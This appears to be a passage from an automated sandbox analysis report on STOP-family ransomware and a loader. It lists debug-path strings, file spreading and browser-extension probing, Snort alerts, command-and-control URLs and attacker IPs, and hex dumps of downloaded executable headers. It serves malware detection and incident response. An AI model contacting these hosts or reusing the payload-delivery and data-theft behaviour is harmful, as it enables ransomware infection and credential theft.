Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\BlB- source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\Temp\wy\ion Data\Application Data\Application Data\Microsoft\input\en-ZW\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\\T source: R5391762lf.exe, 00000007.00000003.2079190952.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078852071.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083952112.000000000346D000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: load_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\M source: R5391762lf.exe, 00000007.00000003.2099831348.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101510258.000000000370A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2081263289.000000000373B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946934767.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100414663.0000000003703000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102557757.0000000003712000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\AC\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\H\* source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: QNBBNQ~1.BGJQNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.bgjs06avERkAqfuwcXY6H5w8dtNc[1].css.bgjst44F3556BE808F99573969118A8E36879BA1ADA6Ction Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\db source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\ source: R5391762lf.exe, 00000007.00000003.2080570314.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2078665185.0000000003491000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2103034298.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098976504.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080800658.00000000034DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*F source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\MSO source: R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\te\ source: R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y\\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\R5391762lf.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 2_2_0040FB98
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Networking

Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.8:49710 -> 186.145.236.18:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49708 -> 186.13.17.220:80
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49710
Source: Traffic Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 186.145.236.18:80 -> 192.168.2.8:49709
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.8:49711 -> 186.145.236.18:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.8:49711 -> 186.145.236.18:80
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199673019888
Source: Malware configuration extractor URLs: http://cajgtus.com/test1/get.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 15:37:11 GMTContent-Type: application/octet-streamContent-Length: 296448Last-Modified: Tue, 23 Apr 2024 19:19:16 GMTConnection: closeETag: "662809b4-48600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 
00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Apr 2024 15:37:35 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 